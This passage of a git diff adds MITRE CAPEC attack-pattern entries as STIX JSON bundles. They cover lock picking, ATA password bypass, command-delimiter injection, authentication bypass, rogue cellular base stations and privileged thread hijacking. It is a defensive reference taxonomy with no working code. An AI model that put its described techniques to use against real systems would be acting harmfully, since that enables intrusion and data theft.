offline dictionary attack on password-based authentications that leverage Microsoft MS-CHAP, such as Cisco LEAP. The tool leverages large password lists to efficiently launch offline dictionary attacks against LEAP user accounts, collected through passive sniffing or active techniques.See also: CVE-2003-1096" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system uses one factor password based authentication.", + "The system does not have a sound password policy that is being enforced.", + "The system does not implement an effective password throttling mechanism." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD). Applicable dictionaries are required. Also a password cracking tool or a custom script that leverages the dictionary database to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A variety of password cracking tools and dictionaries are available to launch this type of an attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--0a4e2ddd-8014-4979-8ddf-42cafef2e657.json b/capec/attack-pattern/attack-pattern--0a4e2ddd-8014-4979-8ddf-42cafef2e657.json new file mode 100644 index 0000000000..7a62a1952d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0a4e2ddd-8014-4979-8ddf-42cafef2e657.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--f0434646-db6d-4e2e-a5be-676d83de6a0e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0a4e2ddd-8014-4979-8ddf-42cafef2e657", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Lock Picking", + "description": "An attacker uses lock picking tools and techniques to bypass the locks on a building or facility. Lock picking is the use of a special set of tools to manipulate the pins within a lock. Different sets of tools are required for each type of lock. Lock picking attacks have the advantage of being non-invasive in that if performed correctly the lock will not be damaged. A standard lock pin-and-tumbler lock is secured by a set of internal pins that prevent the tumbler device from turning. Spring loaded driver pins push down on the key pins preventing rotation so that the bolt remains in a locked position.. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. Most common locks, such as domestic locks in the US, can be picked using a standard 2 tools (i.e. a torsion wrench and a hook pick).", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/393.html", + "external_id": "CAPEC-393" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--0a4e6d07-4253-4194-a606-477cb09a9f36.json b/capec/attack-pattern/attack-pattern--0a4e6d07-4253-4194-a606-477cb09a9f36.json new file mode 100644 index 0000000000..7be6ae05f3 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0a4e6d07-4253-4194-a606-477cb09a9f36.json @@ -0,0 +1,79 @@ +{ + "type": "bundle", + "id": "bundle--edaead3e-6348-4960-8ebb-8fc1af50c91d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0a4e6d07-4253-4194-a606-477cb09a9f36", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Exploiting Incorrectly Configured Access Control Security Levels", + "description": "An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack. Most commonly, attackers would take advantage of controls that provided too little protection for sensitive activities in order to perform actions that should be denied to them. In some circumstances, an attacker may be able to take advantage of overly restrictive access control policies, initiating denial of services (if an application locks because it unexpectedly failed to be granted access) or causing other legitimate actions to fail due to security. The latter class of attacks, however, is usually less severe and easier to detect than attacks based on inadequate security restrictions. This attack pattern differs from CAPEC 1, \"Accessing Functionality Not Properly Constrained by ACLs\" in that the latter describes attacks where sensitive functionality lacks access controls, where, in this pattern, the access control is present, but incorrectly configured.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/180.html", + "external_id": "CAPEC-180" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html", + "external_id": "CWE-732" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Silvio Cesare, Share Library Call Redirection Via ELF PLT Infection (Issue 56), Phrack Magazine, 2000", + "url": "http://phrack.org/issues/56/7.html", + "external_id": "REF-29" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP Top 10 (2007), The Open Web Application Security Project (OWASP)", + "url": "http://www.owasp.org/index.php/Top_10_2007-A3", + "external_id": "REF-45" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "For example, an incorrectly configured Web server, may allow unauthorized access to it, thus threaten the security of the Web application." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target must apply access controls, but incorrectly configure them. However, not all incorrect configurations can be exploited by an attacker. If the incorrect configuration applies too little security to some functionality, then the attacker may be able to exploit it if the access control would be the only thing preventing an attacker's access and it no longer does so. If the incorrect configuration applies too much security, it must prevent legitimate activity and the attacker must be able to force others to require this activity.." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "In order to discover unrestricted resources, the attacker does not need special tools or skills. He only has to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--0aef1f25-ea71-4790-95d5-32b8b16e7ca7.json b/capec/attack-pattern/attack-pattern--0aef1f25-ea71-4790-95d5-32b8b16e7ca7.json new file mode 100644 index 0000000000..bbe133d73c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0aef1f25-ea71-4790-95d5-32b8b16e7ca7.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--b341c0f6-ec95-4572-8518-e2c2d5d2be8a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0aef1f25-ea71-4790-95d5-32b8b16e7ca7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Bypassing ATA Password Security", + "description": "An attacker exploits a weakness in ATA security on a drive to gain access to the information the drive contains without supplying the proper credentials. ATA Security is often employed to protect hard disk information from unauthorized access. The mechanism requires the user to type in a password before the BIOS is allowed access to drive contents. Some implementations of ATA security will accept the ATA command to update the password without the user having authenticated with the BIOS. This occurs because the security mechanism assumes the user has first authenticated via the BIOS prior to sending commands to the drive. Various methods exist for exploiting this flaw, the most common being installing the ATA protected drive into a system lacking ATA security features (a.k.a. hot swapping). Once the drive is installed into the new system the BIOS can be used to reset the drive password.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/402.html", + "external_id": "CAPEC-402" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "Access to the system containing the ATA Drive so that the drive can be physically removed from the system." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--0b3cd893-e335-4def-8662-9af40760517e.json b/capec/attack-pattern/attack-pattern--0b3cd893-e335-4def-8662-9af40760517e.json new file mode 100644 index 0000000000..5d21019ffb --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0b3cd893-e335-4def-8662-9af40760517e.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--8cf6c808-7d68-4181-8346-c4aaaf812f60", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0b3cd893-e335-4def-8662-9af40760517e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Environment Variable Manipulation", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-13 : Subverting Environment Variable Values\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/264.html", + "external_id": "CAPEC-264" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--0cfa0b69-241b-411b-bf20-d4a3b758a672.json b/capec/attack-pattern/attack-pattern--0cfa0b69-241b-411b-bf20-d4a3b758a672.json new file mode 100644 index 0000000000..073e715c3b --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0cfa0b69-241b-411b-bf20-d4a3b758a672.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--5c6aea12-d954-4c90-838f-0fbca6f2b61a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0cfa0b69-241b-411b-bf20-d4a3b758a672", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Target Influence via Framing", + "description": "An adversary uses framing techniques to contextualize a conversation so that the target is more likely to be influenced by the adversary's point of view. Framing is information and experiences in life that alter the way we react to decisions we must make. This type of persuasive technique exploits the way people are conditioned to perceive data and its significance, while avoiding negative or avoidance responses from the target. Rather than a specific technique framing is a methodology of conversation that slowly encourages the target to adopt to the adversary's perspective. One technique of framing is to avoid the use of the word \"No\" and to contextualize responses in a manner that is positive. When performed skillfully the target is much more likely to volunteer information or perform actions favorable to the adversary.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/425.html", + "external_id": "CAPEC-425" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Other (Successful attacks that influence the target via framing into performing an action or sharing sensitive information can result in a variety of consequences that negatively affect the confidentiality of an application or system.)" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--0db28437-bbb7-4654-afda-e51ac1c18f74.json b/capec/attack-pattern/attack-pattern--0db28437-bbb7-4654-afda-e51ac1c18f74.json new file mode 100644 index 0000000000..dd792eccb4 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0db28437-bbb7-4654-afda-e51ac1c18f74.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--4b693f5d-b823-440f-8907-93c78fd2efc0", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0db28437-bbb7-4654-afda-e51ac1c18f74", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Resource Location Spoofing", + "description": "An adversary deceives an application or user and convinces them to request a resource from an unintended location. By spoofing the location, the adversary can cause an alternate resource to be used, often one that the adversary controls and can be used to help them achieve their malicious goals.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/154.html", + "external_id": "CAPEC-154" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "None. All applications rely on file paths and therefore, in theory, they or their resources could be affected by this type of attack." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--0e301650-cbba-4113-9bfd-fb9b637d40c3.json b/capec/attack-pattern/attack-pattern--0e301650-cbba-4113-9bfd-fb9b637d40c3.json new file mode 100644 index 0000000000..e829610d1e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0e301650-cbba-4113-9bfd-fb9b637d40c3.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--9286caa6-602d-4e67-88e5-f0e93721dc1b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0e301650-cbba-4113-9bfd-fb9b637d40c3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cellular Rogue Base Station", + "description": "In this attack scenario, the attacker imitates a cellular base station with his own \"rogue\" base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. the retransmission device) to talk to the rogue base station.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/617.html", + "external_id": "CAPEC-617" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Intercept and control cellular data communications to/from mobile device.)" + ] + }, + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "This technique has been demonstrated by amateur hackers and commercial tools and open source projects are available to automate the attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--0e4fc913-dbca-47cc-ab7c-4e6742e13f90.json b/capec/attack-pattern/attack-pattern--0e4fc913-dbca-47cc-ab7c-4e6742e13f90.json new file mode 100644 index 0000000000..3f463fc2b0 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0e4fc913-dbca-47cc-ab7c-4e6742e13f90.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--9da8e2d7-56d5-47f2-8937-7c055e39f326", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0e4fc913-dbca-47cc-ab7c-4e6742e13f90", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Signature-Based Avoidance", + "description": "This CAPEC has been deprecated because of is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/570.html", + "external_id": "CAPEC-570" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54.json b/capec/attack-pattern/attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54.json new file mode 100644 index 0000000000..8d0fbb4cc7 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54.json @@ -0,0 +1,120 @@ +{ + "type": "bundle", + "id": "bundle--cce55634-d2be-418b-b3db-ffcad0fefe80", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Command Delimiters", + "description": "An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/15.html", + "external_id": "CAPEC-15" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/146.html", + "external_id": "CWE-146" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html", + "external_id": "CWE-77" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html", + "external_id": "CWE-184" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html", + "external_id": "CWE-78" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html", + "external_id": "CWE-185" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/93.html", + "external_id": "CWE-93" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/140.html", + "external_id": "CWE-140" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/157.html", + "external_id": "CWE-157" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/138.html", + "external_id": "CWE-138" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/154.html", + "external_id": "CWE-154" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/713.html", + "external_id": "CWE-713" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n By appending special characters, such as a semicolon or other commands that are executed by the target process, the attacker is able to execute a wide variety of malicious commands in the target process space, utilizing the target's inherited permissions, against any resource the host has access to. The possibilities are vast including injection attacks against RDBMS (SQL Injection), directory servers (LDAP Injection), XML documents (XPath and XQuery Injection), and command line shells. In many injection attacks, the results are converted back to strings and displayed to the client process such as a web browser without tripping any security alarms, so the network firewall does not log any out of the ordinary behavior.\n LDAP servers house critical identity assets such as user, profile, password, and group information that is used to authenticate and authorize users. An attacker that can query the directory at will and execute custom commands against the directory server is literally working with the keys to the kingdom in many enterprises. When user, organizational units, and other directory objects are queried by building the query string directly from user input with no validation, or other conversion, then the attacker has the ability to use any LDAP commands to query, filter, list, and crawl against the LDAP server directly in the same manner as SQL injection gives the ability to the attacker to run SQL commands on the database.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Software's input validation or filtering must not detect and block presence of additional malicious command." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Medium": "The attacker has to identify injection vector, identify the specific commands, and optionally collect the output, i.e. from an interactive session." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--0ede9fe1-83e7-46df-9005-ef287e18addb.json b/capec/attack-pattern/attack-pattern--0ede9fe1-83e7-46df-9005-ef287e18addb.json new file mode 100644 index 0000000000..33669090b7 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0ede9fe1-83e7-46df-9005-ef287e18addb.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--182f8568-8f5d-4431-b9ab-9e443075a05f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0ede9fe1-83e7-46df-9005-ef287e18addb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Authentication Bypass", + "description": "An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place. This refers to an attacker gaining access equivalent to an authenticated user without ever going through an authentication procedure. This is usually the result of the attacker using an unexpected access procedure that does not go through the proper checkpoints where authentication should occur. For example, a web site might assume that all users will click through a given link in order to get to secure material and simply authenticate everyone that clicks the link. However, an attacker might be able to reach secured web content by explicitly entering the path to the content rather than clicking through the authentication link, thereby avoiding the check entirely. This attack pattern differs from other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than faking authentication by exploiting flaws or by stealing credentials from legitimate users.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/115.html", + "external_id": "CAPEC-115" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html", + "external_id": "CWE-287" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_prerequisites": [ + "An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc." + ], + "x_capec_resources_required": [ + "A client application, such as a web browser, or a scripting language capable of interacting with the target." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--10500aa1-6d0e-486c-8c87-8d24e20e01a7.json b/capec/attack-pattern/attack-pattern--10500aa1-6d0e-486c-8c87-8d24e20e01a7.json new file mode 100644 index 0000000000..3144ed573e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--10500aa1-6d0e-486c-8c87-8d24e20e01a7.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--15e92323-24a0-4053-81a7-6b31db81079c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--10500aa1-6d0e-486c-8c87-8d24e20e01a7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Lifting credential(s)/key material embedded in client distributions (thick or thin)", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-37 : Retrieve Embedded Sensitive Data. Please refer to this other pattern going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/205.html", + "external_id": "CAPEC-205" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--10c3386d-d8da-45ea-9963-67befef551d5.json b/capec/attack-pattern/attack-pattern--10c3386d-d8da-45ea-9963-67befef551d5.json new file mode 100644 index 0000000000..0b2d3e2a89 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--10c3386d-d8da-45ea-9963-67befef551d5.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--26959e1c-4fc1-4ac1-a78d-2bc22fbeb341", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--10c3386d-d8da-45ea-9963-67befef551d5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Compromising Emanations Attack", + "description": "Compromising Emanations (CE) are defined as unintentional signals which an attacker may intercept and analyze to disclose the information processed by the targeted equipment. Commercial mobile devices and retransmission devices have displays, buttons, microchips, and radios that emit mechanical emissions in the form of sound or vibrations. Capturing these emissions can help an adversary understand what the device is doing.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/623.html", + "external_id": "CAPEC-623" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html", + "external_id": "CWE-201" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Capture vibrations/emissions from the handset or retransmission device display screen to recreat display information from a distance.)" + ] + }, + "x_capec_prerequisites": [ + "Proximal access to the device." + ], + "x_capec_skills_required": { + "High": "Sophisticated attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--1156154f-d8f9-4722-b1e7-311bd7326d94.json b/capec/attack-pattern/attack-pattern--1156154f-d8f9-4722-b1e7-311bd7326d94.json new file mode 100644 index 0000000000..41f4c64f0e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--1156154f-d8f9-4722-b1e7-311bd7326d94.json @@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--654a62b2-dce7-4c28-91af-16794e7b5820", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--1156154f-d8f9-4722-b1e7-311bd7326d94", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Hijacking a Privileged Thread of Execution", + "description": "Adversaries can sometimes hijack a privileged thread from the underlying system through synchronous (calling a privileged function that returns incorrectly) or asynchronous (callbacks, signal handlers, and similar) means. This can allow the adversary to access functionality the system's designer didn't intend for them to, but they may also go undetected or deny other users essential services in a catastrophic (or insidiously subtle) way.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/30.html", + "external_id": "CAPEC-30" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/270.html", + "external_id": "CWE-270" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "Adversary targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread (e.g., a system call). The adversary could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users", + "In order to feasibly execute this class of attacks, the adversary must have the ability to hijack a privileged thread.This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or providing malformed user-controllable input that causes the executing thread to fault and return to a higher privilege level or such.This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute." + ], + "x_capec_resources_required": [ + "\n None: No specialized resources are required to execute this type of attack. The adversary needs to be able to latch onto a privileged thread.\n The adversary does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the adversary's malicious code. This is the case even if the adversary conducts the attack remotely.\n " + ], + "x_capec_skills_required": { + "High": "Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as 